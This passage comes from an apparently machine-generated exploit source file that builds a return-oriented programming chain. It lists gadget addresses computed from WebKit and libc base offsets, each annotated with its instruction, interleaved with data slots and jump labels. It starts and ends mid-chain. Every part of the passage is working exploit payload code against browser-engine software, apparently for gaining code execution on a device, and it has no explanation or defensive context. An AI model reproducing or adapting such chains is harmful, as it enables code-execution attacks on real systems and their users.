//pop rsi ropchain+513120, //L11224 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+513136, //L11225 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11224: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11225: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub 
rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+513312, //L11227 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+513328, //L11228 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+513296, //L11226 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L11226: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11227: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11228: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+513440, //L11230 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+513488, //L11233 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+513456, //L11231 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L11230: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11231: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11232: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11233: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+513600, //L11234+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+513592, //L11234 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L11234: db([0, 0]); // 0x0 set_gadgets([ ropchain+513616, //L11234+24 ropchain+515560, //L11229 libc_base+764760, //pop rsi ropchain+513656, //L11235 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11235: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11237: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+513776, //L11240 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+513760, //L11238 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11238: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11240: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+513920, //L11243 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+513888, //L11241 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+513904, //L11242 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11241: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11242: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11243: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+514000, //L11244 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11244: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11246: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+514120, //L11249 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+514104, //L11247 webkit_base+660161, //mov [rsi], 
rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11247: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11249: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+514264, //L11252 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+514232, //L11250 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+514248, //L11251 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11250: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11251: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11252: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+514352, //L11254 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L11253: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L11254: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+514408, //L11255 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11255: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11257: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+514488, //L11259 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11259: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi 
libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+514600, //L11260 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11260: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11262: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+514720, //L11265 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+514704, //L11263 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11263: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11265: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+514864, //L11268 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+514832, //L11266 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+514848, //L11267 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11266: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11267: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11268: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+514944, //L11269 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L11269: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11270: db([32, 0]); // 0x20 set_gadget(libc_base+144605,); //pop rdi //L11271: db([32, 0]); // 0x20 set_gadgets([ 
webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+515072, //L11273 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+515056, //L11272 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L11272: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11273: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+515152, //L11274 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11274: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11276: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+515272, //L11279 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+515256, //L11277 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11277: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11279: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+515352, //L11281 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+515384, //L11283 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11281: db([0, 0]); // 0x0 set_gadgets([ libc_base+759608, //pop rax //L11282: ropchain+515512, //L11280 libc_base+144605 //pop rdi ]); //L11283: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+515488, //L11285 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+515504, //L11284 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L11285: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L11284: db([0, 0]); // 0x0 //L11280: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967264, 4294967295]); // -0x20 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+515576, //L11286 //L11229: libc_base+782311, //pop rsp ropchain+515592, //L11287 //L11286: libc_base+782311, //pop rsp ropchain+511568, //L11185 //L11287: //L11179: //L11288: libc_base+764760, //pop rsi ropchain+515632, //L11289 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11289: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11291: db([4294967208, 4294967295]); // -0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+515752, //L11294 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+515736, //L11292 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11292: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11294: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+515832, //L11295 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+515848, //L11296 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L11295: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11296: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+516008, //L11300 webkit_base+660161, 
//mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+515976, //L11298 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+515992, //L11299 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11297: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L11298: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11299: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11300: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+516064, //L11302 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L11302: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+516192, //L11304 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+516208, //L11305 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+516176, //L11303 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11303: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L11304: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11305: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+516368, //L11309 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+516336, //L11307 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+516352, //L11308 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11306: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L11307: db([0, 
0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11308: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11309: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+516424, //L11311 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L11311: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+516552, //L11313 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+516568, //L11314 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+516536, //L11312 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11312: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L11313: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11314: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+516728, //L11318 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+516696, //L11316 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+516712, //L11317 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11315: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L11316: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11317: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11318: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+516784, //L11320 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L11320: db([0, 0]); // 0x0 set_gadgets([ 
libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+516912, //L11322 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+516928, //L11323 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+516896, //L11321 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11321: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L11322: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11323: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+517008, //L11324 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+517024, //L11325 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L11324: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11325: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+517120, //L11327 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+517104, //L11326 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L11326: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11327: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+517200, //L11328 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L11328: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11329: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11330: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, 
//movsxd rax, edi libc_base+764760, //pop rsi ropchain+517344, //L11331 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+517376, //L11333 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+517360, //L11332 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11331: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11332: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11333: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+517552, //L11335 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+517568, //L11336 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+517536, //L11334 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L11334: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11335: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11336: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+517728, //L11341 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+517744, //L11342 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+517680, //L11338 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L11338: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); 
//pop rsi //L11339: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L11340: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L11341: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11342: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+517856, //L11343+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+517848, //L11343 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L11343: db([0, 0]); // 0x0 set_gadgets([ ropchain+517872, //L11343+24 ropchain+520680, //L11337 libc_base+764760, //pop rsi ropchain+517912, //L11344 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11344: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11346: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+518032, //L11349 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+518016, //L11347 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11347: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11349: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+518208, //L11352 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+518224, //L11353 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+518176, //L11350 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi 
ropchain+518192, //L11351 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11350: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L11351: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11352: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11353: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+518320, //L11355 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+518304, //L11354 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L11354: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11355: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L11356: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L11357: db([10, 0]); // 0xa set_gadget(libc_base+763368,); //pop rcx //L11358: db([10, 0]); // 0xa set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+518520, //L11360 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11360: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+518576, //L11361 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11361: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 
4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+518712, //L11365 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+518696, //L11364 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11363: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L11364: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11365: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+518832, //L11368 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+518800, //L11366 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11366: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11367: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11368: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+518968, //L11370 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+518984, //L11371 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+518952, //L11369 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L11369: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11370: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11371: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+519144, //L11376 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+519160, 
//L11377 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+519096, //L11373 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L11373: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11374: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L11375: db([1, 0]); // 0x1 set_gadget(webkit_base+3236123,); //pop r9 //L11376: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11377: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+519280, //L11378+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+519272, //L11378 webkit_base+660161, //mov [rsi], rax 